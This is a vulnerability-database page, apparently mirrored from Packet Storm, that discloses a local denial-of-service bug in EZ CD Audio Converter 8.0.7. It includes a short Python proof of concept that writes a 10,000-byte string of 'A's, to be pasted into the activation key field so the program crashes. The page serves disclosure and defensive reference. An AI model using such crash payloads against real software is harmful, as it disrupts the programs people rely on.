Lucene search
K

EZ CD Audio Converter 8.0.7 Denial Of Service

🗓️ 02 Jan 2019 00:00:00Reported by AchillesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

EZ CD Audio Converter 8.0.7 Denial Of Service vulnerability

Code
`# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)  
# Date: 2018-12-30  
# Exploit Author: Achilles  
# Vendor Homepage: https://www.poikosoft.com/  
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe  
# Exploit Author: Achilles  
# Tested Version: 8.0.7 (64-bit)  
# Tested on: Windows 7 x64  
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow  
# Steps to Produce the Crash:=20  
# 1.- Run python code : EZ_CD_Audio_Converter.py  
# 2.- Open EVIL.txt and copy content to clipboard  
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'  
# 4.- Paste the content of EVIL.txt into the field: 'Key'  
# 5.- And you will see a crash.  
  
#!/usr/bin/env python  
  
buffer = "\x41" * 10000  
  
try:  
f=open("Evil.txt","w")  
print "[+] Creating %s bytes evil payload.." %len(buffer)  
f.write(buffer)  
f.close()  
print "[+] File created!"  
except:  
print "File cannot be created"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
28